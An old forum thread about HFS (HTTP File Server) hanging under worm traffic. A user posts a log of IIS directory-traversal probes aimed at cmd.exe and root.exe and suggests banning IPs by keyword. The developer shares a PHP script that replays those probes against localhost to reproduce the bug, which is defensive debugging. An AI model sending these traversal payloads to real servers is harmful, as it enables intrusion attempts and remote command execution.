Automatically ban worms?

[Anonymous]

Would be very nice if you could automatically ban IP addresses that send GET request contain certain keywords.

Kind of like this:
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir

etc...

[Anonymous]

Second time this happens today now, but it seems that when I get these worm get attempts, HFS will hang.

The menu button stops working completly, for instance

[Anonymous]

Second time this happens today now, but it seems that when I get these worm get attempts, HFS will hang.

The menu button stops working completly, for instance

Rejetto, this seems consistent for me, because HFS has hung all three times i've gotten these malformed GET requests.

[rejetto]

i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request

[Anonymous]

i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request

Here's a log file:

on 3 occations the same IP caused HFS to hang. When trying to click the Menu button, nothing would happen.

I added the IP as banned when it happened the first time, so I only saw ".... connected" after that, but still the server hung.

Code: [Select]

2004-09-21 11:17:41 213.114.30.46:2299 Connected
2004-09-21 11:17:41 213.114.30.46:2299 Requested GET /scripts/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2301 Connected
2004-09-21 11:17:41 213.114.30.46:2301 Requested GET /MSADC/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2301 Request dump
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2313 Connected
2004-09-21 11:17:41 213.114.30.46:2313 Requested GET /c/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2313 Request dump
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2315 Connected
2004-09-21 11:17:41 213.114.30.46:2315 Requested GET /d/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2315 Request dump
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2320 Connected
2004-09-21 11:17:41 213.114.30.46:2320 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2326 Connected
2004-09-21 11:17:42 213.114.30.46:2326 Requested GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2326 Request dump
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2328 Connected
2004-09-21 11:17:42 213.114.30.46:2328 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2328 Request dump
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2331 Connected
2004-09-21 11:17:42 213.114.30.46:2331 Requested GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2331 Request dump
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2335 Connected
2004-09-21 11:17:42 213.114.30.46:2335 Requested GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2335 Request dump
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2339 Connected
2004-09-21 11:17:42 213.114.30.46:2339 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2339 Request dump
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2340 Connected
2004-09-21 11:17:42 213.114.30.46:2340 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2343 Connected
2004-09-21 11:17:42 213.114.30.46:2343 Requested GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2343 Request dump
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2344 Connected
2004-09-21 11:17:43 213.114.30.46:2344 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2344 Request dump
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2346 Connected
2004-09-21 11:17:43 213.114.30.46:2346 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2346 Request dump
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2353 Connected
2004-09-21 11:17:43 213.114.30.46:2353 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2353 Request dump
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2360 Connected
2004-09-21 11:17:43 213.114.30.46:2360 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2360 Request dump
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close


[Anonymous]

i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request

The tool is probably a worm like "Code red" or something. I don't have that

[rejetto]

i made this php script to test, but it was not able to hang my HFS

Code: [Select]

<?
$urls = array(
'/scripts/root.exe?/c+dir',
'/MSADC/root.exe?/c+dir',
'/c/winnt/system32/cmd.exe?/c+dir',
'/d/winnt/system32/cmd.exe?/c+dir',
'/scripts/..%255c../winnt/system32/cmd.exe?/c+dir',
'/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%252f../winnt/system32/cmd.exe?/c+dir',
);

foreach ($urls as $url) {
  $sock = fsockopen('localhost', 80) or die('cant open');
  fwrite($sock, "GET $url HTTP/1.0\r\nHost: www\r\nConnection: close\r\n\r\n");
  while (!feof($sock)) fread($sock,4096);
  fclose($sock);
  echo '.';
}
?>

[Anonymous]

I'll report back with a full log if it happens again. (haven't run the server in a while now).

I had "let browse" on the root turned off when this happened (if that would be any kind of help)